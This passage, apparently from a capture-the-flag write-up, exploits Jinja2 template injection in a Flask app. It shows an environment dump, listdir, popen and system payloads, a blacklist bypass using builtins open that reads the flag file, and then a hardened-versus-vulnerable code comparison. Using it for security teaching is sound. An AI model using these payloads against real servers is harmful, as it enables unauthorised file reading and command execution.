'chmod': <built-in function chmod>, 'SEEK_CUR': 1, 'getpgid': <built-in function getpgid>, 'popen4': <function popen4 at 0x7fde0fdfd7d0>, 'O_ASYNC': 8192, '_execvpe': <function _execvpe at 0x7fde0fdf20c8>, 'open': <built-in function open>, 'putenv': <built-in function putenv>, 'fdopen': <built-in function fdopen>, 'errno': <module 'errno' (built-in)>, 'WIFEXITED': <built-in function WIFEXITED>, 'system': <built-in function system>, 'ST_MANDLOCK': 64, 'name': 'posix', 'rmdir': <built-in function rmdir>, 'O_WRONLY': 1, 'dup': <built-in function dup>, 'fdatasync': <built-in function fdatasync>, '__doc__': "OS 
routines for NT or Posix depending on what system we're on.\n\nThis exports:\n - all functions from posix, nt, os2, or ce, e.g. unlink, stat, etc.\n - os.path is one of the modules posixpath, or ntpath\n - os.name is 'posix', 'nt', 'os2', 'ce' or 'riscos'\n - os.curdir is a string representing the current directory ('.' or ':')\n - os.pardir is a string representing the parent directory ('..' or '::')\n - os.sep is the (or a most common) pathname separator ('/' or ':' or '\\\\')\n - os.extsep is the extension separator ('.' or '/')\n - os.altsep is the alternate pathname separator (None or '/')\n - os.pathsep is the component separator used in $PATH etc\n - os.linesep is the line separator in text files ('\\r' or '\\n' or '\\r\\n')\n - os.defpath is the default search path for executables\n - os.devnull is the file path of the null device ('/dev/null', etc.)\n\nPrograms that import and use 'os' stand a better chance of being\nportable between different platforms. Of course, they must then\nonly use functions that are defined by all platforms (e.g., unlink\nand opendir), and leave all pathname manipulation to os.path\n(e.g., split and join).\n", 'minor': <built-in function minor>, 'getpid': <built-in function getpid>, 'fork': <built-in function fork>, 'isatty': <built-in function isatty>, 'execvpe': <function execvpe at 0x7fde0fdf2050>, 'O_LARGEFILE': 0, 'EX_NOPERM': 77, 'closerange': <built-in function closerange>, 'execvp': <function execvp at 0x7fde0fdf4f50>, 'WSTOPSIG': <built-in function WSTOPSIG>, 'getenv': <function getenv at 0x7fde0fd75b18>, 'sysconf_names': {'SC_REALTIME_SIGNALS': 9, 'SC_PII_OSI_COTS': 63, 'SC_PII_OSI': 57, 'SC_T_IOV_MAX': 66, 'SC_THREADS': 67, 'SC_AIO_MAX': 24, 'SC_USHRT_MAX': 118, 'SC_THREAD_KEYS_MAX': 74, 'SC_XOPEN_XPG4': 100, 'SC_SEM_VALUE_MAX': 33, 'SC_XOPEN_XPG2': 98, 'SC_XOPEN_XPG3': 99, 'SC_GETGR_R_SIZE_MAX': 69, 'SC_SEM_NSEMS_MAX': 32, 'SC_AVPHYS_PAGES': 86, 'SC_NL_NMAX': 122, 'SC_PAGESIZE': 30, 'SC_EXPR_NEST_MAX': 42, 
'SC_XOPEN_LEGACY': 129, 'SC_SHRT_MAX': 113, 'SC_2_SW_DEV': 51, 'SC_SSIZE_MAX': 110, 'SC_RTSIG_MAX': 31, 'SC_THREAD_PRIO_INHERIT': 80, 'SC_EQUIV_CLASS_MAX': 41, 'SC_NL_ARGMAX': 119, 'SC_PII_OSI_CLTS': 64, 'SC_2_CHAR_TERM': 95, 'SC_THREAD_PROCESS_SHARED': 82, 'SC_VERSION': 29, 'SC_LONG_BIT': 106, 'SC_SIGQUEUE_MAX': 34, 'SC_ATEXIT_MAX': 87, 'SC_BC_BASE_MAX': 36, 'SC_SELECT': 59, 'SC_XOPEN_ENH_I18N': 93, 'SC_PAGE_SIZE': 30, 'SC_PII_XTI': 54, 'SC_MEMORY_PROTECTION': 19, 'SC_TIMER_MAX': 35, 'SC_AIO_LISTIO_MAX': 23, 'SC_UCHAR_MAX': 115, 'SC_SCHAR_MAX': 111, 'SC_2_UPE': 97, 'SC_NL_SETMAX': 123, 'SC_RE_DUP_MAX': 44, 'SC_BC_SCALE_MAX': 38, 'SC_TZNAME_MAX': 6, 'SC_LOGIN_NAME_MAX': 71, 'SC_NPROCESSORS_ONLN': 84, 'SC_SEMAPHORES': 21, 'SC_SAVED_IDS': 8, 'SC_XOPEN_SHM': 94, 'SC_2_FORT_RUN': 50, 'SC_XOPEN_VERSION': 89, 'SC_IOV_MAX': 60, 'SC_2_VERSION': 46, 'SC_THREAD_DESTRUCTOR_ITERATIONS': 73, 'SC_ASYNCHRONOUS_IO': 12, 'SC_MESSAGE_PASSING': 20, 'SC_CHILD_MAX': 1, 'SC_ULONG_MAX': 117, 'SC_2_C_VERSION': 96, 'SC_ARG_MAX': 0, 'SC_GETPW_R_SIZE_MAX': 70, 'SC_XOPEN_CRYPT': 92, 'SC_SCHAR_MIN': 112, 'SC_AIO_PRIO_DELTA_MAX': 25, 'SC_NL_LANGMAX': 120, 'SC_THREAD_STACK_MIN': 75, 'SC_CHAR_MIN': 103, 'SC_NL_TEXTMAX': 124, 'SC_STREAM_MAX': 5, 'SC_UIO_MAXIOV': 60, 'SC_MEMLOCK': 17, 'SC_NZERO': 109, 'SC_SHARED_MEMORY_OBJECTS': 22, 'SC_THREAD_THREADS_MAX': 76, 'SC_THREAD_ATTR_STACKADDR': 77, 'SC_INT_MIN': 105, 'SC_SHRT_MIN': 114, 'SC_COLL_WEIGHTS_MAX': 40, 'SC_THREAD_PRIORITY_SCHEDULING': 79, 'SC_THREAD_ATTR_STACKSIZE': 78, 'SC_PHYS_PAGES': 85, 'SC_JOB_CONTROL': 7, 'SC_FSYNC': 15, 'SC_CHARCLASS_NAME_MAX': 45, 'SC_XOPEN_UNIX': 91, 'SC_BC_DIM_MAX': 37, 'SC_PII_INTERNET_STREAM': 61, 'SC_MB_LEN_MAX': 108, 'SC_UINT_MAX': 116, 'SC_CHAR_BIT': 101, 'SC_XOPEN_REALTIME': 130, 'SC_MQ_OPEN_MAX': 27, 'SC_PII_OSI_M': 65, 'SC_PRIORITY_SCHEDULING': 10, 'SC_NGROUPS_MAX': 3, 'SC_MQ_PRIO_MAX': 28, 'SC_XBS5_LPBIG_OFFBIG': 128, 'SC_PII_SOCKET': 55, 'SC_MAPPED_FILES': 16, 'SC_PII_INTERNET_DGRAM': 62, 
'SC_XBS5_LP64_OFF64': 127, 'SC_XOPEN_XCU_VERSION': 90, 'SC_OPEN_MAX': 4, 'SC_PRIORITIZED_IO': 13, 'SC_TTY_NAME_MAX': 72, 'SC_WORD_BIT': 107, 'SC_SYNCHRONIZED_IO': 14, 'SC_PASS_MAX': 88, 'SC_PII_INTERNET': 56, 'SC_LINE_MAX': 43, 'SC_XBS5_ILP32_OFF32': 125, 'SC_2_C_DEV': 48, 'SC_2_C_BIND': 47, 'SC_BC_STRING_MAX': 39, 'SC_THREAD_PRIO_PROTECT': 81, 'SC_CHAR_MAX': 102, 'SC_XBS5_ILP32_OFFBIG': 126, 'SC_2_LOCALEDEF': 52, 'SC_PII': 53, 'SC_POLL': 58, 'SC_2_FORT_DEV': 49, 'SC_INT_MAX': 104, 'SC_NPROCESSORS_CONF': 83, 'SC_DELAYTIMER_MAX': 26, 'SC_THREAD_SAFE_FUNCTIONS': 68, 'SC_MEMLOCK_RANGE': 18, 'SC_NL_MSGMAX': 121, 'SC_TIMERS': 11, 'SC_XOPEN_REALTIME_THREADS': 131, 'SC_CLK_TCK': 2}, 'link': <built-in function link>, 'execve': <built-in function execve>, 'wait4': <built-in function wait4>, 'O_SYNC': 1052672, 'chdir': <built-in function chdir>, 'wait3': <built-in function wait3>, '_make_statvfs_result': <function _make_statvfs_result at 0x7fde0fdfde60>, 'strerror': <built-in function strerror>, 'popen3': <function popen3 at 0x7fde0fdfd758>, 'abort': <built-in function abort>, 'setresuid': <built-in function setresuid>, 'error': <type 'exceptions.OSError'>, 'ftruncate': <built-in function ftruncate>, 'WUNTRACED': 2, 'setuid': <built-in function setuid>, 'EX_DATAERR': 65, 'curdir': '.', 'sysconf': <built-in function sysconf>, 'ST_NOATIME': 1024, 'W_OK': 2, 'EX_OK': 0, 'R_OK': 4, 'statvfs_result': <type 'posix.statvfs_result'>, 'O_NONBLOCK': 2048, 'confstr': <built-in function confstr>, 'path': <module 'posixpath' from '/usr/lib/python2.7/posixpath.pyc'>, 'WEXITSTATUS': <built-in function WEXITSTATUS>, 'EX_NOUSER': 67, 'pipe': <built-in function pipe>, 'chroot': <built-in function chroot>, 'getgroups': <built-in function getgroups>, 'spawnlpe': <function spawnlpe at 0x7fde0fdfd668>, 'geteuid': <built-in function geteuid>, 'spawnve': <function spawnve at 0x7fde0fdfd398>, 'setpgrp': <built-in function setpgrp>, '__package__': None, 'write': <built-in function write>, 
'EX_UNAVAILABLE': 69, 'altsep': None, 'waitpid': <built-in function waitpid>, 'forkpty': <built-in function forkpty>, 'nice': <built-in function nice>, 'listdir': <built-in function listdir>, 'pathconf': <built-in function pathconf>, '_pickle_stat_result': <function _pickle_stat_result at 0x7fde0fdfdde8>, 'ST_RDONLY': 1, 'unsetenv': <built-in function unsetenv>, 'SEEK_SET': 0, 'spawnle': <function spawnle at 0x7fde0fdfd578>, 'O_RDONLY': 0, 'O_DIRECT': 16384, 'sys': <module 'sys' (built-in)>, 'pathconf_names': {'PC_MAX_INPUT': 2, 'PC_VDISABLE': 8, 'PC_SYNC_IO': 9, 'PC_SOCK_MAXBUF': 12, 'PC_NAME_MAX': 3, 'PC_MAX_CANON': 1, 'PC_PRIO_IO': 11, 'PC_CHOWN_RESTRICTED': 6, 'PC_ASYNC_IO': 10, 'PC_NO_TRUNC': 7, 'PC_FILESIZEBITS': 13, 'PC_LINK_MAX': 0, 'PC_PIPE_BUF': 5, 'PC_PATH_MAX': 4}, 'confstr_names': {'CS_XBS5_LP64_OFF64_CFLAGS': 1108, 'CS_LFS64_CFLAGS': 1004, 'CS_XBS5_LPBIG_OFFBIG_LIBS': 1114, 'CS_XBS5_ILP32_OFFBIG_LINTFLAGS': 1107, 'CS_XBS5_ILP32_OFF32_LIBS': 1102, 'CS_XBS5_ILP32_OFF32_LINTFLAGS': 1103, 'CS_LFS64_LIBS': 1006, 'CS_XBS5_ILP32_OFF32_CFLAGS': 1100, 'CS_XBS5_ILP32_OFFBIG_CFLAGS': 1104, 'CS_LFS_LDFLAGS': 1001, 'CS_LFS_LINTFLAGS': 1003, 'CS_LFS_LIBS': 1002, 'CS_PATH': 0, 'CS_LFS64_LINTFLAGS': 1007, 'CS_LFS_CFLAGS': 1000, 'CS_LFS64_LDFLAGS': 1005, 'CS_XBS5_ILP32_OFFBIG_LIBS': 1106, 'CS_XBS5_ILP32_OFF32_LDFLAGS': 1101, 'CS_XBS5_LPBIG_OFFBIG_LINTFLAGS': 1115, 'CS_XBS5_ILP32_OFFBIG_LDFLAGS': 1105, 'CS_XBS5_LP64_OFF64_LINTFLAGS': 1111, 'CS_XBS5_LP64_OFF64_LIBS': 1110, 'CS_XBS5_LPBIG_OFFBIG_CFLAGS': 1112, 'CS_XBS5_LPBIG_OFFBIG_LDFLAGS': 1113, 'CS_XBS5_LP64_OFF64_LDFLAGS': 1109}, 'setgroups': <built-in function setgroups>, 'unlink': <built-in function unlink>, 'tcgetpgrp': <built-in function tcgetpgrp>, 'spawnlp': <function spawnlp at 0x7fde0fdfd5f0>, 'spawnl': <function spawnl at 0x7fde0fdfd500>, 'EX_PROTOCOL': 76, 'getuid': <built-in function getuid>, 'spawnvp': <function spawnvp at 0x7fde0fdfd410>, 'X_OK': 1, 'O_EXCL': 128, 'fpathconf': <built-in function 
fpathconf>, 'chown': <built-in function chown>, 'environ': {'LANG': 'en_US.UTF-8', 'SUPERVISOR_SERVER_URL': 'unix:///var/run/supervisor.sock', 'LANGUAGE': 'en_US:en', 'SERVER_SOFTWARE': 'gunicorn/19.9.0', 'SUPERVISOR_ENABLED': '1', 'SUPERVISOR_PROCESS_NAME': 'app', 'SUPERVISOR_GROUP_NAME': 'app', 'PATH': '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'}, 'O_NDELAY': 2048, 'EX_CONFIG': 78, 'EX_USAGE': 64, 'ST_NODEV': 4}
```

`listdir()` is discovered!!

---

```
GET /{{url_for.__globals__.os.__dict__.listdir('./')}}
```

```
['app.py', 'flag_secret_file_910230912900891283']
```

The flag file is discovered!!

---

## 【Find a way to read flag】

### **1. Try via the OS command execution functions**

```
GET /{{url_for.__globals__.os.__dict__.popen('ls').read()}} ⇒500 error WAF
GET /{{url_for.__globals__.os.__dict__.system('ls').read()}}  ⇒500 error WAF
```

It was impossible via OS command execution: both `popen` and `system` are caught by the WAF...

---

### **2. Try via a file manipulation function**

```
GET /{{url_for.__globals__.__builtins__.open('flag_secret_file_910230912900891283').read()}}
```

`flag{blacklists_are_insecure_even_if_you_do_not_know_the_bypass_friend_1023092813}`
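The root cause is the pattern the "fix" left in place: user input is concatenated into the template source and only a keyword blacklist stands in the way. The following is an added example (not the challenge's code nor the author's); the blocked tokens are an assumption that mirrors the 500 responses observed above, and it contrasts that blacklist approach with passing the input as a template variable, using the `{{7*7}}` probe from the writeup as the check.

```python
from jinja2 import Environment

# Assumed blacklist, reconstructed from the tokens that returned 500 above.
BLOCKED_TOKENS = ("self", "config", "request", "[")


def render_with_blacklist(user_input: str):
    """Vulnerable pattern: the 'fixed' server from the writeup.

    User input becomes part of the template *source*, so anything the
    blacklist misses is still evaluated by Jinja2. Returns (status, body)
    to mirror the WAF behaviour seen in the writeup.
    """
    if any(token in user_input for token in BLOCKED_TOKENS):
        return 500, ""  # the WAF's 500 error
    template = Environment().from_string("Hello " + user_input)
    return 200, template.render()


def render_safely(user_input: str):
    """Hardened pattern: the template is a fixed string and the user input is
    only a *value* inside the render context, so template syntax in it is
    never parsed. autoescape additionally neutralises HTML in the echo.
    """
    env = Environment(autoescape=True)
    template = env.from_string("Hello {{ value }}")
    return 200, template.render(value=user_input)


def is_template_evaluated(render_fn) -> bool:
    """The detection check from the writeup: if the {{7*7}} probe comes back
    as 49, input is reaching the template engine as code."""
    status, body = render_fn("{{7*7}}")
    return status == 200 and "49" in body


if __name__ == "__main__":
    print("blacklist version evaluates input:", is_template_evaluated(render_with_blacklist))
    print("hardened version evaluates input: ", is_template_evaluated(render_safely))
```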